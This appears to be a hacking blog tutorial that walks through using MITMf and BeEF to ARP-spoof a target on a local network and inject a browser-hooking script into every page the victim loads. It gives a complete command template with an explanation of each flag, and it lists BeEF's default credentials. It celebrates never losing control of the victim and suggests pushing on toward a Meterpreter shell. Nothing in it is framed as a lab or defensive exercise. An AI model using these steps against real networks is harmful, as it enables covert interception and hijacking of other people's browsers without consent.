Do you remember the last time we used BeEF? Well, now we get to use it again, but this time with MITMf! We are going to auto-inject the hooking script into every webpage the victim visits!
If you don't already have it, install MITMf via apt-get install mitmf. You might want to apt-get update first. If you want to, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I've had trouble with that version.
BeEF should already be installed in Kali/Back|Track.
Open a new terminal and type cd /usr/share/beef-xss/.
As you can see, we have BeEF installed, and we can go ahead and run it by typing ./beef. You should get this output:
Do you see the Hook URL? That's important. Remember or copy the URL provided.
Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials "beef" for both the username and password. Once inside the UI, you should have this screen:
Open up a new terminal. We'll be using MITMf to inject the hooking script. Use mitmf --spoof --arp -i <interface> --gateway <router IP> --target <target IP> --inject --js-url <hook.js URL> as the format.
- --spoof loads the spoof plugin
- --arp redirects ARP packets
- -i specifies the interface to inject packets on
- --gateway sets the IP of your router to redirect through
- --target sets the target IP to inject the hook.js script
- --inject loads the inject function
For instance, I use this command:
Run the command and MITMf should start giving you some output.
MITMf is telling us that it has successfully injected the hook.js script into the websites that the target visited.
If we check our BeEF panel, you will see the hooked computer right on the Online Browsers tab.
Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don't have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you'll never lose control!
Now we know what power lies within MITMf... we can do so much more. From there, you can continue trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks...
NOTE: This only works with non-HSTS websites. You could try the --hsts function, but it might make things too slow and/or glitchy.
C|H of C3